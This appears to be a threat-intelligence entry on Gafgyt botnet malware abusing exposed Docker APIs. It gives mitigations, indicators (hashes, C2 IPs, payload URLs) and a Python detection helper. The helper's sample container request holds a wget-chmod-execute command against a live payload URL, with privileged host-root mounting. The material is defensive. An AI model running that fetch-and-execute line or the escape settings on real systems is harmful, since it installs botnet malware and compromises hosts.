Gafgyt Malware Broadens Its Scope in Recent Attacks
Dec. 3, 2024, 11:03 p.m.
Description
Trend Micro researchers have observed threat actors abusing misconfigured Docker servers (Docker Remote API endpoints reachable from the internet) to deploy Gafgyt, a botnet malware historically aimed at IoT devices. The attackers create containers from the legitimate 'alpine' image and use them to fetch and run the malware. The attack sequence attempts to download and execute a series of Gafgyt binaries built for different CPU architectures (the atlas.* payloads listed under Indicators), any of which can be tasked with DDoS attacks against targets chosen by the operator. Command-and-control addresses are hardcoded in the binaries, and the DDoS capability spans multiple protocols. The attackers also attempt privilege escalation from the container toward the host (T1611) and enumerate local IP addresses (T1016). Targeting Docker hosts marks a significant expansion beyond Gafgyt's usual IoT scope. The direct mitigation is to never expose the Docker daemon's TCP API without TLS client authentication, and to restrict it to trusted networks; the indicators below can be matched against proxy logs and Docker API request logs to find hosts that were already reached.
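As an added example (not code from Trend Micro's report or from this page), the following Python helper turns the indicators listed under Indicators below into offline detection checks: it inspects the JSON body of a Docker `POST /containers/create` request for known payload URLs and for host-escape settings, matches squid-style proxy log lines against the C2 IPs and payload URLs, and looks up SHA-256 hashes. The hashes, IPs and URLs are the ones on this page; the log line format, the `Finding` type, the sample request bodies and the sample log lines are constructed for the example, and the set of risky `HostConfig` fields is a generic escape-to-host check rather than a statement about which settings this campaign used.

```python
"""Offline detection helpers for the Gafgyt-on-Docker activity described above.
Indicators (hashes, IPs, URLs) are the ones listed on this page; the log
format, sample events and field names are constructed for the example."""
from __future__ import annotations

import re
from dataclasses import dataclass

C2_HOSTS = {"178.215.238.31", "178.215.238.24"}  # from this page
PAYLOAD_URL_RE = re.compile(r"https?://178\.215\.238\.31/bins/atlas\.\w+")
PAYLOAD_SHA256 = {  # from this page
    "f8388cba15175fa7fda8daacfd095972e1a96faaabeede411f99f42f71ae395b",
    "f7004355f2bf653d3f055bc674822f99a8ff3692a02c1aec6b727a782e37b836",
    "ed6c93faebd9a60e132f4f952a1b516e758ce0e445b225eb702dfd2c8c2db6c0",
    "c1c03eab6bbca461f4a9dc7395103cdb0aa018563e835150c66228f3d7edadaa",
    "b7f0ac1551ab58a1b84ba8e63dfc98dd126f7abe686137cbffc8ff95bfbac1ba",
    "bb2bd8819045055af5295c23d1293b2d215fabe7dcf097813b9624ab98a13976",
    "6b385dc32daff689c1c448bf5f9151996abbac730e167a9cbfa9111591f253ea",
    "a79a9653209c9d942dee0be597e04845fc5250880edcc5c3cb50110153925a03",
    "68c215494fd35e097bf76eb3886b95ec66fdc707ebcf10f221b4db4ac2cd6d70",
    "36ee47d10acbf8fbc7b16d4d237e2be567491b95dcd333856268c6c63a02f358",
    "19778568781fd397ee2415d0a3593ffcaff4f333cdc27e52a1b23e07de08fdb6",
    "156c85a09a1d5d753ce3fd128e0bb6097bb5b18e6cc0ffe6f9bc99a218a21ed9",
    "0b7e14e3305fd25b250ad494c014b0f8dfefaf0f3e8413bd797db12dd2eb9d8c",
}

# Generic escape-to-host (T1611) settings to flag on container creation.
# Which of these the campaign used is not stated on the page.
RISKY_HOST_CONFIG = {"Privileged": True, "PidMode": "host", "NetworkMode": "host"}
SENSITIVE_HOST_PATHS = {"/", "/var/run/docker.sock", "/proc", "/sys", "/etc"}


@dataclass
class Finding:
    source: str
    reason: str
    evidence: str


def check_container_create(body: dict, source: str = "docker-api") -> list[Finding]:
    """Inspect the JSON body of a Docker POST /containers/create request."""
    findings: list[Finding] = []
    image = body.get("Image", "")
    host_cfg = body.get("HostConfig", {})
    for key, bad in RISKY_HOST_CONFIG.items():
        if host_cfg.get(key) == bad:
            findings.append(Finding(source, f"HostConfig.{key}={bad!r}", image))
    for bind in host_cfg.get("Binds", []):
        host_path = bind.split(":", 1)[0]
        if host_path in SENSITIVE_HOST_PATHS:
            findings.append(Finding(source, "sensitive host path bind-mounted", bind))
    cmd = " ".join(body.get("Cmd", []))
    if PAYLOAD_URL_RE.search(cmd) or any(h in cmd for h in C2_HOSTS):
        findings.append(Finding(source, "known Gafgyt payload host in Cmd", cmd))
    return findings


# Constructed squid-style line: "<ts> <client> <status> <method> <url>"
PROXY_LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<status>\S+) (?P<method>\S+) (?P<url>\S+)")


def check_proxy_line(line: str) -> Finding | None:
    """Match one proxy access-log line against the page's payload URLs and C2 IPs."""
    m = PROXY_LINE_RE.match(line)
    if not m:
        return None
    url = m.group("url")
    if PAYLOAD_URL_RE.match(url):
        return Finding(m.group("client"), "Gafgyt payload download", url)
    host = re.sub(r"^https?://", "", url).split("/", 1)[0].split(":", 1)[0]
    if host in C2_HOSTS:
        return Finding(m.group("client"), "contact with Gafgyt C2 host", url)
    return None


def is_known_payload(sha256: str) -> bool:
    """Case-insensitive lookup of a SHA-256 against the page's hash list."""
    return sha256.strip().lower() in PAYLOAD_SHA256


# Constructed samples (not from the report).
SAMPLE_CREATE = {
    "Image": "alpine",
    "Cmd": ["sh", "-c", "wget http://178.215.238.31/bins/atlas.mips -O /tmp/a; chmod +x /tmp/a; /tmp/a"],
    "HostConfig": {"Privileged": True, "Binds": ["/:/mnt"]},
}
BENIGN_CREATE = {"Image": "alpine", "Cmd": ["sleep", "3600"], "HostConfig": {}}
SAMPLE_PROXY_LOG = [
    "1733250000.101 10.0.3.14 TCP_MISS/200 GET http://178.215.238.31/bins/atlas.mips",
    "1733250001.205 10.0.3.14 TCP_MISS/200 GET http://178.215.238.24/",
    "1733250002.310 10.0.3.15 TCP_MISS/200 GET http://example.com/index.html",
]


def run_samples() -> dict:
    """Run every check over the constructed samples and summarise the hits."""
    return {
        "create": len(check_container_create(SAMPLE_CREATE)),
        "benign": len(check_container_create(BENIGN_CREATE)),
        "proxy": [f.reason for line in SAMPLE_PROXY_LOG if (f := check_proxy_line(line))],
        "hash": is_known_payload("F8388CBA15175FA7FDA8DAACFD095972E1A96FAAABEEDE411F99F42F71AE395B"),
    }


if __name__ == "__main__":
    for finding in check_container_create(SAMPLE_CREATE):
        print(finding)
    print(run_samples())
```

The container-create check fires three times on the constructed request (privileged mode, the host root bind-mounted at /mnt, and the payload URL in the command) and not at all on the benign one; the proxy check catches both a payload download and a bare contact with the second C2 address. In a real deployment the request bodies would come from the daemon's audit or proxy layer in front of the API, since the dockerd log itself does not record full create bodies.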
Date
Published: Dec. 3, 2024, 6:15 p.m.
Created: Dec. 3, 2024, 6:15 p.m.
Modified: Dec. 3, 2024, 11:03 p.m.
Indicators
f8388cba15175fa7fda8daacfd095972e1a96faaabeede411f99f42f71ae395b
f7004355f2bf653d3f055bc674822f99a8ff3692a02c1aec6b727a782e37b836
ed6c93faebd9a60e132f4f952a1b516e758ce0e445b225eb702dfd2c8c2db6c0
c1c03eab6bbca461f4a9dc7395103cdb0aa018563e835150c66228f3d7edadaa
b7f0ac1551ab58a1b84ba8e63dfc98dd126f7abe686137cbffc8ff95bfbac1ba
bb2bd8819045055af5295c23d1293b2d215fabe7dcf097813b9624ab98a13976
6b385dc32daff689c1c448bf5f9151996abbac730e167a9cbfa9111591f253ea
a79a9653209c9d942dee0be597e04845fc5250880edcc5c3cb50110153925a03
68c215494fd35e097bf76eb3886b95ec66fdc707ebcf10f221b4db4ac2cd6d70
36ee47d10acbf8fbc7b16d4d237e2be567491b95dcd333856268c6c63a02f358
19778568781fd397ee2415d0a3593ffcaff4f333cdc27e52a1b23e07de08fdb6
156c85a09a1d5d753ce3fd128e0bb6097bb5b18e6cc0ffe6f9bc99a218a21ed9
0b7e14e3305fd25b250ad494c014b0f8dfefaf0f3e8413bd797db12dd2eb9d8c
178.215.238.31
178.215.238.24
http://178.215.238.31/bins/atlas.sh4
http://178.215.238.31/bins/atlas.mips
http://178.215.238.31/bins/atlas.mipsel
http://178.215.238.31/bins/atlas.m68k
http://178.215.238.31/bins/atlas.i686
http://178.215.238.31/bins/atlas.i586
http://178.215.238.31/bins/atlas.arm7
http://178.215.238.31/bins/atlas.arm6
http://178.215.238.31/bins/atlas.arm5
http://178.215.238.31/bins/atlas.arm4
Attack Patterns
Lizkebab
Bashlite
Gafgyt
T1611 (Escape to Host)
T1610 (Deploy Container)
T1059.004 (Command and Scripting Interpreter: Unix Shell)
T1016 (System Network Configuration Discovery)
T1105 (Ingress Tool Transfer)
T1071 (Application Layer Protocol)
T1498 (Network Denial of Service)
T1133 (External Remote Services)